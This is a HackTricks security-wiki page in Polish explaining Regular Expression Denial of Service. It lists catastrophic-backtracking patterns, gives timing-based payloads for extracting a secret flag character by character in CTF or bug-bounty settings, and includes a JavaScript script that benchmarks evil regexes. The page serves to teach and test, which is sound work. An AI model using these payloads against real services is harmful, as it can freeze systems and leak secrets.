Regular expression Denial of Service - ReDoS

Regular expression Denial of Service - ReDoS

Support HackTricks

Regular Expression Denial of Service (ReDoS)

Denial of Service z powodu wyrażenia regularnego (ReDoS) ma miejsce, gdy ktoś wykorzystuje słabości w działaniu wyrażeń regularnych (sposób na wyszukiwanie i dopasowywanie wzorców w tekście). Czasami, gdy używa się wyrażeń regularnych, mogą one stać się bardzo wolne, szczególnie jeśli tekst, z którym pracują, staje się większy. Ta wolność może być tak zła, że rośnie naprawdę szybko nawet przy niewielkich zwiększeniach rozmiaru tekstu. Atakujący mogą wykorzystać ten problem, aby spowodować, że program używający wyrażeń regularnych przestanie działać poprawnie na długi czas.

Problematyczny algorytm regex naiwności

Sprawdź szczegóły w https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

Złe wyrażenia regularne

Zły wzór wyrażenia regularnego to taki, który może utknąć na stworzonym wejściu, powodując DoS. Złe wzory regex zazwyczaj zawierają grupowanie z powtórzeniem oraz powtórzenie lub alternatywę z nakładającymi się elementami wewnątrz powtórzonej grupy. Niektóre przykłady złych wzorów to:

  • (a+)+

  • ([a-zA-Z]+)*

  • (a|aa)+

  • (a|a?)+

  • (.*a){x} dla x > 10

Wszystkie te wzory są podatne na wejście aaaaaaaaaaaaaaaaaaaaaaaa!.

Ładunki ReDoS

Ekstrakcja ciągu za pomocą ReDoS

W CTF (lub bug bounty) być może kontrolujesz regex, z którym dopasowywana jest wrażliwa informacja (flaga). Wtedy może być przydatne, aby strona zamarła (przekroczenie czasu lub dłuższy czas przetwarzania), jeśli regex dopasował i nie, jeśli nie dopasował. W ten sposób będziesz mógł ekstrahować ciąg znak po znaku:

  • W tym poście możesz znaleźć tę regułę ReDoS: ^(?=<flag>)((.*)*)*salt$

  • Przykład: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$

  • W tym opisie możesz znaleźć ten: <flag>(((((((.*)*)*)*)*)*)*)!

  • W tym opisie użyto: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

Kontrolowanie wejścia i regexu w ReDoS

Poniżej znajdują się przykłady ReDoS, w których kontrolujesz zarówno wejście, jak i regex:

function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Narzędzia

Odniesienia

Wsparcie HackTricks

Last updated